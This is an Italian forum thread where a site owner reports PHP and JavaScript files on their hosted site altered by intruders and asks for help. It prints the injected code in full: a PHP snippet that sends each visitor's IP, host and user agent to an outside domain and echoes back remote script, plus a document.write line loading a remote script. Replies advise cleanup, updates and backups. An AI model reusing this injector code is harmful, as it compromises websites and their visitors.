modifiche pagine PHP

[miste]

Oggi mi sono accorto che in alcune pagine php del mio sito su aruba è stato aggiunto del codice, esattamente questo:

#f80c6e#
error_reporting(0); ini_set('display_errors',0); $wp_dnspx89074 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_dnspx89074) && !preg_match ('/bot/i', $wp_dnspx89074))){
$wp_dnspx0989074="http://"."error"."style".".com/style"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_dnspx89074);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_dnspx0989074);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_89074dnspx = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_89074dnspx,1,3) === 'scr' ){ echo $wp_89074dnspx; }

#/f80c6e#

avete idea se è stato fatto da aruba stesso o mi hanno hackerato il sito?

grazie

[Angarat]

mandi a questo indirizzo http:// errorstyle. com/ style/ l'ip del visitatore, il referer e l'HTTP_USER_AGENT tramite curl di php e non credo che aruba abbia interesse su errorstyle.com, per il resto non so

[miste]

Che sito e` errorstyle? Come mi dovrei comportare, devo contattare aruba?

[miste]

aiuto!!! addirittura nei .js sono state aggiunte righe del tipo:
/*7ab15a*/
/*rwrw09180rw09*/
document.write("<script type='text/javascript' src='http://www.miraquetepinto.com.ar/modulos/y7pCdRZY.php?id=195246'></"+ "script>");

/*/7ab15a*/

[Alhazred]

Non è stato certamente Aruba ad aggiungerti questo codice, sicuramente è stato qualcun altro.
Il tuo sito è fatto con Wordpress mi pare di capire, le possibilità sono queste:
- hai installato un plugin scadente in termini di sicurezza e qualcuno che lo ha sfruttato per accedere al tuo sito aggiungendo tale codice
- è stata sfruttata una falla propria di WP
- sullo stesso server sul quale si trova il tuo sito c'è un altro sito vulnerabile e da lì hanno avuto accesso a tutti gli altri

Dopo aver rimosso tutto il codice malevolo (e potrebbe essercene anche in altre parti che non hai notato, quindi dovrai spulciarti tutti i file), quello che puoi fare è questo:
- aggiorna WP all'ultima versione disponibile e mantienilo SEMPRE aggiornato
- assicurati di usare solo plugin ben noti e con un buon supporto, che siano costantemente aggiornati ed aggiornali SEMPRE
- tieni sempre un backup dell'ultima versione del tuo sito in modo che se capitasse di nuovo una cosa così, invece di spulciare tutti i file puoi cancellare tutto e fare l'upload di una versione pulita

Ad ogni modo contatta Aruba e digli quanto ti è accaduto, dovrebbero controllare il server per verificare che non sia stato infettato da un qualche virus.

[miste]

grazie prima di tutto.
Non uso wordpress ed il sito non l'aggiornavo da mesi, comunque il backup settimanale, sempre su aruba, è pulito, quindi è successo in questi ultimi giorni

[Alhazred]

Ok, mi è venuto in mente WP avendo visto delle variabili $wp_... ma effettivamente fanno parte del codice malevolo, non del tuo sito.
Ad ogni modo usi un qualche altro CMS oppure hai scritto tutto tu il codice del sito?
Se usi un CMS, qualunque esso sia, valgono le stesse cose che ti ho detto per WP.
Se invece il sito l'hai scritto tutto tu, rivedi il codice per aumentarne la sicurezza.

Scrivi ugualmente al supporto Aruba per riportare l'accaduto, un controllo sul server dovrebbero farlo comunque.

[miste]

non uso cms, la maggior parte del codice lo scrivo io, ma è chiaro che funzioni particolari e script vari li scarico dalla rete